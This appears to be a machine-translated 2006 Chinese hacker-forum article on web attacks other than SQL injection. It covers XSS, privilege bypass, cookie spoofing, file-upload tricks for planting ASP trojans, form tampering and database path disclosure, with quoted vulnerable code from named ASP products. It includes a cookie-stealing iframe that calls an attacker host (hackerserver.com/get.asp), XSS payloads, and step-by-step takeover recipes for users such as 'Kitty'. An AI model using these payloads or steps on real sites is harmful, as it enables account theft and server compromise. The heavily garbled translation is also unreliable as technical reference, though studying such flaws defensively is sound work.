Site program-Africa SI exploits-vulnerability warning-the black bar safety net

ID MYHACK58:6220067489
Type myhack58
Reporter 佚名
Modified 2006-02-28T00:00:00


Part I Preface Now the most popular online site attack means, to was SQL Injection, even though SI technology is easy to use, and easy to obtain greater privileges, but because of the limelight too big, now generally is a little security-conscious programmer will pay attention to this problem, and by the GET method to submit the data will be a server record in the case, and makes network management very easy to find the intruders. A non-SI type of attack relative to said Access server operation permission is not, but for to get the data for the purpose of the invasion is still very useful. Part II describes methods of Non-conventional SI-based attacks has the following categories: A, cross-site scripting attacks(XSS) Cross-site scripting attack is not directly on the web server to cause destruction, which is the main object of attack is site visitors, here the intruder generally has three purposes: One is on website page viewers to be against: as in the web page added to the automatic download of the code, or use like IE Frame vulnerability, etc. to the viewer implanted Trojan, or hijacked browser, etc. The second is to steal browser cookies. The intruder can be on your own website to build one that can accept and save the information of the page, and in the invasion of the site on the page join one of the length and width are 0 The Hidden iframe, the address is:http://hackerserver. com/get. asp? info=document. cookies, server-side get. asp page to accept the info and save it in the database, so the intruder can get the viewer in the invasion on the site cookies the information. If a theft is generally the user's password, the harm is not very large, but if the intruders use social engineering, so after login and the password stored in the cookies of the admin access page, you can steal the Administrator's password, thereby to further control site. The third is the use of a lot of visitors request to repeat a certain operation. A little while ago a business website, the message says a domestic famous search engine in its search Alliance added a hidden iframe to access the business website, itsDDOSthe attack led to which the server load is too large. Not to mention this thing is true or false, but this line of thinking is that we should note. 2 0 0 4 year 1 Phase 1 of the hackers X-Files, there is an article titled play with X under the tree article(paragraph 6, Page 2), The authors use cross-site scripting attack in the page, insert a post code, a huge traffic so that the garbage posts a number of spikes, and finally the server is overwhelmed almost to collapse. Cross site attack means seems simple, simply in the submitted content(such as messages, comments)is added dangerous code can be, but how to bypass the program of the illegal character of the filter, it is a very complex thing. Commonly used means are: change case, convert ASII code or escape characters, call a remote js script file and other scripts of the deformed and hidden method, using the Flash Geturl parameters, etc. Tips 1, How to deal with a form of detection. Some sites in order to prevent cross-site scripting attacks, in which a form to add some Javascript code to detect the text box value, such as unlawful on the pop-up dialog box prompts, and to prohibit the submission, but this only in client restrictions is equivalent to what limit are not made, we can put a web page saved locally, remove the corresponding detection JS code, and then modify the web page in the form action attribute to point to the website, and then submit, if the site is not on the server side again for verification, then it will be invasion. (Hebei Province high school Information Technology examination procedures on the existence of this vulnerability.) 2, on the UBB's. The UBB code is some program in order to limit the html code at the same time will not make submission of the information is too monotonous and the use of a means, which method is to allow the user to use some specific tags, and then on the server side to convert these tags, but if the conversion statement is not well written words will still be dangerous. We will later in the examples further demonstrate the bypass UBB method.) The following please tell me with example to understand it: Example 1-1: No filtering of script insertion This is a dynamic marketplace a version of the“customer feedback”feature is a named fk. asp since the submission of the page, wherein the data is stored to the database The code is like this.

rs. addnew rs(\\"fksubject\\")=checkFFSQLStr(trim(request(\\"fksubject\\"))) rs(\\"fkleixing\\")=checkFFSQLStr(request(\\"fkleixing\\")) rs(\\"fkcontent\\")=checkFFSQLStr(trim(request(\\"fkcontent\\"))) ‘look, no dangerous character filtering rs(\\"fkusername\\")=checkFFSQLStr(trim(request(\\"fkusername\\"))) rs(\\"fkemail\\")=checkFFSQLStr(trim(request(\\"fkemail\\"))) rs(\\"fktel\\")=checkFFSQLStr(trim(request(\\"fktel\\"))) rs(\\"fklaizi\\")=checkFFSQLStr(trim(request(\\"fklaizi\\"))) rs(\\"fkdate\\")=now rs(\\"fkip\\")=Request. ServerVariables(\\"remote_addr\\") rs. update rs. close It is not difficult to find, the program on the data stored into the database before only to whether there can be constituted of SI in the character of the filter, the filter just is not necessary, because the parameters are not introduced into the query conditions, and the dangerous characters such as script, etc. is not filtered, the display message page lyb. asp is also not first filtered and then displayed. If we are in the comments submitted in the<script>alert(document. cookie)</script>,it can pop-up the user's cookies information. (Figure a) Examples 1-2: filter bad UBB script insertion A famous Blog program UBB conversion page ubbcode. asp which converts dangerous characters in one piece are as follows:

Str = Replace(Str, \\"script\\", \\"script\\") Str = Replace(Str, \\"SCRIPT\\", \\"SCRIPT\\") Str = Replace(Str, \\"Script\\", \\"Script\\") Str = Replace(Str, \\"script\\", \\"Script\\") We can submit a sCRipt such characters to get around this limitation, such as submission of information

[ img ]javAScript:window. close() /img You can close the window.

Second, unauthorized attack Unauthorized attack is because the programmer access to the page right of the detection of imperfections caused by that an intruder does not need to give the user or administrator password access to only specific users or administrators can access the page of a vulnerability. This override makes me think of a long, long time ago about 2 0 0 0 years ago, the popular“chat room kicked People's Congress law”, is the use of access some of the user permission to detect the imperfections of the chat program is responsible for kicking people of the page to reach any kick people purposes. However, the more administrator privileges vulnerabilities are usually relatively subtle, especially for non-open source program, most can only use their experience to guess. Then look at a more General user permissions example: a program to modify the user information page through the Get the GET the parameters introduced into the program for processing, display related data, such as: it would have been to modify the user Daniel information, but if the program does not add anything else to verify that we can modify the value of the parameter to modify any user's information, such as submission http://targetzone. com/edituser. asp? userid=Kitty to modify the Kitty user's information. Programmers in the production of such a program should verify that session to determine whether the user login, and it should be from session to get the current login username, and the rest such as Get,cookies, etc. data is not credible. Then an override, we can call it“the step-override”, such vulnerability is directed to certain needs N steps to complete the process, the X-step does not detect whether the completion of the X-1 Step leaving the attacker can skip the first X-1 Step. This vulnerability often appear in the password program, the final verification is completed to change the password the page just put you want to modify the username to a hidden field placed in the page, but the next there is no correlation detection result can modify any user's password. Tips 1, The Hidden domain of use. Many programmers prefer to use form hidden fields instead of session in the program to pass some of the steps that appear in the parameters, for certain non-sensitive data, so you can save some server resources, but for some sensitive data, this is very dangerous, because the user while on the page do not see the hidden field, but the user can view the source code to find the hidden field, and you can put a web page saved to local and modify the hidden field value to achieve the ultra vires purpose. Well, let's look at a few examples: Example 2-1: A version of the dynamic Mall to retrieve the user password of the step vulnerability The dynamic marketplace of this version of the vulnerability a lot, which retrieve the password section is divided into 4 pages, getpwd. asp~getpwd4. asp, respectively, corresponding to fill in a user name, fill in the password prompt answer, re-set password, the new password is updated to the database. Wherein getpwd4. the asp part of the code is written so.

<%username=request(\\"username\\") passwd=md5(trim(request. form(\\"passwd\\"))) set rs=Server. CreateObject(\\"Adodb. Recordset\\") sql=\\"select * from [user] where username=’\\"&username&\\"’\\" rs. open sql,conn,1,3 If rs. eof Then %> <script language=\\"javascript\\"> alert(\\"this user has not registered yet, please go to home REGISTER now!\\") location. href=\\"javascript :history. back()\\" </script> <% else rs(\\"userpassword\\")=passwd rs. update end if rs. close set rs=nothing conn. close set conn=nothing%>......... Can be found in the first row is not detected requect to get the data in the end is not to fill in the relevant information. Assume that we for some reason want to steal user Kitty password: we can do: first register a new user, Daniel, and note the fill in the prompt question answer, and then go retrieve the password until getpwd3. asp this page, this page is saved to the local, use Notepad to open the page, the form action attribute value in Daniel to Kitty, and put the URL of the full complement, and then in the local open this page, fill in the password and submit it you can modify the Kitty's password for you just now on this page fill in the password. Example 2-2: nine cool network individual homepage space management system 3. 0 ultra vires vulnerability: The program detects whether the login is in the page The include file chkuser. asp to achieve

<%if session(\\"user_userid\\")=\\"\\" or session(\\"user_username\\")=\\"\\" then ‘vulnerability reasons Response. write\\"<script>alert(’sorry, you are not logged in or Sign In go wrong!’); top. location. href=’index. asp’</script>\\" response. End end if %> You can see, this file just check the session is empty, and there is no check in the end whether the operation is a currently logged in user! So this app existed for many of the ultra vires vulnerability, look at the user modify the information of the vulnerability: after landing you can see the interface is divided into upper, left, and right three framework. At the top of the frame is mainly a few a navigation connection, press and hold the shift point of the”Modify personal information”, so that it opens in a new window, the address is: asp? userid=3 9&username=Daniel, not hard to see that address in the username parameter value is the current user name, then we give it a modified try...... Open the page asp? userid=3 9&username=Kitty, Bingo! On the web page shows our registration Kitty when the user fill in the information! Just change it...... Here we can modify it to the password hint question and answer, then go through the“Forgot Password”function to modify the user's password. Then look at the display and modify any user files vulnerabilities. After testing, responsible for displaying the File List page is asp? userid=3 9&username=Daniel&path=Daniel, we can modify the path value here for the file on the server to view, upload, Delete, Rename and other operations. Examples 2-3: The LB5000 modify registration statement of vulnerability Since ray proud of LB5000 the setregmsg. cgi and setregrules. cgi two files there override the vulnerability, an attacker can directly modify the forum“registration statement”and the“short Messaging welcome information.” Submit the following request can modify the“registration statement”: the cgi-bin/setregrules. cgi? action=process&therules=to modify the content. We can use this to write some cross-site code. Third, the cookies trick What are cookies? Cookies are stored in the browser directory of text files that record your visit to a particular site, and can only be created this cookies site read back, about by 2 5 5 characters, only accounts for a 4KB hard disk space. When a user is browsing a site, it is stored in the client memory, after exiting the browser, it is stored in the user's hard disk. Stored in Cookies most of the information is common, such as when you browse a site, this file records every keystroke information and the visited site's address. However, many Web sites use Cookies to storage for private data, such as: the registration password, user name, credit card number, etc. Cookies spoofing is on the client to the site to read the cookies to modify as we want to camouflage the value of the program to cheat, let them mistakenly believe that we are already logged in user so as to achieve some purpose, it can be said, This is also the override of a method. We still say some of the programmers on the risk estimates is insufficient, the client is too trusting, the supposed to be stored in the session of sensitive information stored in the cookies led to this vulnerability, so this vulnerability is relatively is relatively hidden. For this attack the General idea is to get a legitimate cookies->use the tool to modify the cookies->access restriction page, and override is successful. Suppose we are in the site http://targetzone. com has a legitimate account of Daniel,now we want to use the user Kitty logged in, but we do not have Kitty password(nonsense, otherwise also attacks what......), the We try cookies cheat method to achieve purpose: To Daniel the identity of the landing of the targetzone. com and select Save login information, close the browser, use the IECookiesView this software to open the machine, the Cookies information, 选择站点,modify the username value for the Kitty, to visit the website again, the discovery we have in the Kitty the identity of the landing. However, this attack also has a relatively large hard injury, not to mention the site whether the information stored in the cookies, a single that some website put the username and password saved in cookies, each visit when the first based on username and password is detected, and then determine whether the legitimate. So that this vulnerability actually used alone is not very effective, but in conjunction with other invasion of the right to use more, such as the download of a site a database, but the passwords are MD5 encrypted, unless brute force a MD5 hash value, otherwise not on the site of the landing, however if the site is to put the username and MD5 passwords saved in Cookies, we can application. Or the website of the anti-SI measures compare closely, the url is not found in the injection point, can be in the cookies to find the injection point. There is also the website to the user's permission to save in cookies, can also be modified to achieve an elevated purpose. Example 3-1 A download program a spoofing vulnerability: Its processing login code is like this:

<%If Cookies(\\"down_Isadder\\")=\\"\\" then%> <script language=\\"Vbscript\\"> msgbox(\\"sorry, you do not have permission to manage users! If you are an administrator, please login!\\") window. close() </script> <%Else%> ............ Really dizzy, you'll detect that cookies is empty, so we use the IECookiesView to put down_Isadder value to any value, of course, in addition to a null value can be log management. Example 3-2: L-blog the cookie override upload spoofing vulnerability: Recently this loophole was destroyed, including many hackers, including a WebLog. L-Blog extract the cookies file there is a logical vulnerability that any user can cross over to the Administrators the privileges to upload files. File attachment. the asp part of the code: IF memStatus="SupAdmin" OR memStatus="Admin" Then IF Request. QueryString("action")="upload" Then You can see, the program detects SupAdmin the value is not an administrator of the corresponding value, if it is allowed to upload, and did not detect the logged in user is who. Look at the validation cookies of the program command. asp, to detect if the memName(cookies made of the username)is empty, then do not perform any operation. If not empty, then verify that save username and password are correct, incorrect, empty of cookies. Here we leave a loophole, if the cookies in the username value(memName)is empty, and the user permissions(memStatus)value is not empty, this command. the asp file will not validate the user name and password, but the upload page is detected memStatus is the administrator, can upload. We can first register the ordinary user, the login and save the cookies, modify the cookies so that the memName value is empty, memStatus value for the SupAdmin or Admin, then you can upload. But you can only upload certain types of files, we cannot upload Asp Trojan, how to do it...... We then look at how to pass asp Trojan. Fourth, the illegal upload vulnerability To a legitimate cause illegal, let's say two simple not exploit the vulnerability. Some program restrictions such as asp,asa, etc extension is not uploaded, but we look at the IIS Settings, found that there is some extension is used by asp. dll explained, such as cer so if certain procedures are not allowed to upload asp file, we can put Trojan in the extension to cer, then upload, then if the server is not the cer's resolve to remove the words, we can run the Trojan. There are some extension that can perform SSI(Server Side Include)directives, such as stm, Upload a seeit. stm file, the content is” <!--# include file="conn. asp" - >”, and then access this file, you can see conn. the asp file's contents. So the programmers made in the upload detection, it should be set like belowMember is allowed to upload and not what kind of file cannot be uploaded. Talking about upload program vulnerabilities. A while ago the emergence of dynamic network Forum upload vulnerability can be described as the UPS and downs Ah, Daniel also used this vulnerability to attack under many obstinate broiler, we first move the mesh in the upload to analyze: Dynamic network was not allowed to upload asp and other dangerous files, but its upload processing there is a certain vulnerability to cause the program to obtain the parameters of an error so that an intruder can upload any file. Look first submit the Upload a page reg_upload. asp:

<form name=\\"form\\" method=\\"post\\" action=\\"upfile. asp\\" enctype=\\"multipart/form-data\\" > <input type=\\"hidden\\" name=\\"filepath\\" value=\\"uploadFace\\"> <input type=\\"hidden\\" name=\\"act\\" value=\\"upload\\"> <input type=\\"file\\" name=\\"file1\\"> <input type=\\"hidden\\" name=\\"fname\\"> <input type=\\"submit\\" name=\\"Submit\\" value=\\"upload\\" onclick=\\"fname. value=file1. value,parent. document. forms[0]. Submit. disabled=true, parent. document. forms[0]. Submit2. disabled=true;\\"> </form> The program is to extract the file1 form and fname in the form of value to make a judgment. That is directly from the page submit to upload the asp files, the program is detected. We can, however, construct their own data packages and the use of NC submission, reaching over the detection purpose. But our main problem is after uploading the file be sure to be asp format, although file1 the value of the legitimate, but eventually reach a save extension is asp object what should I do? Action Network of the non-component upload class in a sentence is written so:

filename=formPath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&\\".\\"& amp;fileExt The filename of the program to generate the saved file name. In the computer to detect the string of the key is to see whether the encounter’characters, if Yes,then that end of the string. In other words, we in the construction of the uploaded file save path,just tricking the computer,let him think something like"uploadfaceDaniel. asp" so that the path parameter has already ended, we can achieve our purpose. This exploits the principle of analysis here, many now upload all the existence of this vulnerability, first capture and then manually submitting just too tired, Daniel recommends that you use online some upload vulnerability use tools to reduce the burden. Then take a look at a My power 3. 5 1 vulnerabilities. Its upload page Upfile_Soft. the asp part of the code is this:

Fot i=0 to ubound(arrUpFileType) If fileEXT=trim(arrUpFileType(i)) then Enableupload=true Because My power used to upload class can upload multiple files, We from the above code can be seen, if you upload multiple files, the first N-1 of the file extension is not legal, and the N-th file extension is legitimate, then, is by testing. So we just have to construct their own pages, upload the two files, and the second extension is the program can be uploaded, you can. But My power system is a Prohibited form of external submission, how to bypass this limit?, link-a form of attack and Defense。 Small tricks: 1, The use of database backup and recovery functions of the legal becomes illegal. After all there are many system does not exist the upload of logical vulnerabilities, then how do we upload the script Trojan. This know-how requires you can login the backend, and the site system to have backup and Restore Database functions. Now through legitimate channels put the Trojans renamed as legitimate extension to upload, and then in the backup and Restore Database page, the upload after the file name written in the backup and restore of the path, and then restore, since the app is the database with the asp extension store, so the Trojan can also be normal parsing. Five, forms of attack and Defense Earlier in this article some of the places already mentioned something about the program in the form of insecurity, now let us summarize. For the form of the attack, the main idea is to contain the form of the page to save to your local, modify and remove the related restriction, and its action submitted to the address completion is available on the website address, then submit. It is not difficult to see, on the form of all, if the server does not verify that the words are dangerous and untrustworthy. Recommendations of the programmers on the client to do the form to check the legality at the same time try on the server side again to verify and on the server side plus the corresponding prohibition of external submission of the code.:

<%server_v1=Cstr(Request. ServerVariables(\\"HTTP_REFERER\\")) server_v2=Cstr(Request. ServerVariables(\\"SERVER_NAME\\")) if mid(server_v1,8,len(server_v2))<>server_v2 then response. write \\"<br><br><center><table border=1 cellpadding=2 0 bordercolor=black bgcolor=#EEEEEE width=4 5 0>\\" response. write \\"<tr><td style=’font:9pt Verdana’>\\" response. write \\"your path is wrong, banned from the site outside the submitted data please do not mess this parameter!\\" response. write \\"</td></tr></table></center>\\" response. end end if%>

We have to think about what forms of restrictions: Js validity check, hidden field, can not be modified(ReadOnly)domain. Don't know if you remember ofstar Forum the forum group, using a readonly field to display a group of members, we can put the web download down, remove the readonly attribute, and then yourself plus you want to join this forum of members, and then submit...... Small tricks: 1, bypass is prohibited external submission: You can write yourself a socket program to modify the http_referer value, but this method is more trouble, I introduce a simple. This trick requires that you have upload image permissions. IE to open the pictures, if the picture is html code, just like web as you can run its code. So we can put the structure of the page change extension pictures, and upload, visit this page and submit is in the server-side submission. (Note:This method in the constructor of the page must be such as<html>those basic tags are written in full.)

Example 5-1: nine cool network individual homepage space management system 3. 0 to any directory upload vulnerability: After landing, click on the”Upload File”button, pop up a web page, which can be set to upload every number, there is an Upload Directory text box, but not modified, in IE in this page, save it, and then find the file of the first 4 line 4, The code is: <LI>upload: <INPUT class=INPUT style="WIDTH: 200px" ReadOnly...we put the ReadOnly deleted, and then locate the file the first 3 line 7, the form tag action attribute values in the complement(that is, put the website address plus) ,and then in the local open this page, then”upload”text box has to be modified, we will change it to:../, select the file to upload, you can find that this file has been passed to the upper level directory.

Six, storm Gallery, storm of the contents of the file vulnerability We've all heard the%5c storm library vulnerability is for the operation of the database the page the address bar closest to the filename of the”/”with”%5c”, if the following conditions are met, you can see the path to the database: General error return to the page is local to the IE,so we have turned off the Local the error page,specifically under the menu item‘tools->internet Options->advanced->display a friendly information’; the other database if the Access type; the%5c in the storm library need is the secondary directory, the primary directory can not be successful; the other pages are not fault-tolerant statements. The principle is more complex, please your Google. Some programmers like to include the page extension, write to inc, and many tutorials are also recommended, but this makes the program the presence of a large loophole, since the inc default not by asp. dll resolution, so it is directly in the text mode display, so if others can directly access your database define the page(such as conn. inc)to a known address database or the SQL account password. Some sites in order to prevent the software download of hotlinking, for the download software are with a page read, then the output stream is transmitted to the client, the file name parameter is usually to GET additional on the address, 如 we can probably guess its a Data Link file with respect to the Software Library location, and change the path parameter value and, if lucky, will be able to download without asp. the dll parses the data link file. Part III summary and PostScript The time is early morning, the sun rises, the sun bathed the earth, it took about 3 days of spare time to write this article here basically is over, but I would like to emphasize is that the Web application in Central Africa SI of vulnerabilities far more than that, and many unknown logic vulnerabilities alsoIs not to be found, the topic due to space and time limitations, only now some of the more common means for a simple introduction, I hope Daniel can serve to initiate the effect, everyone if really seriously to study online some of the program code, you can find many not be someone else found the vulnerability appeared. Vulnerability is not terrible, terrible of is that the programmer is not a rigorous approach and a complete, comprehensive way of thinking. Chief potatoes had asked me how I thought of this topic, in fact I just about only use NBSI disorder injection site of the rookie, including my own behavior feel deep regret and concern, will only use the tools the hackers are not hackers, we must learn to use their thoughts to discover vulnerabilities, patched vulnerabilities, in order to do real art on the increase. !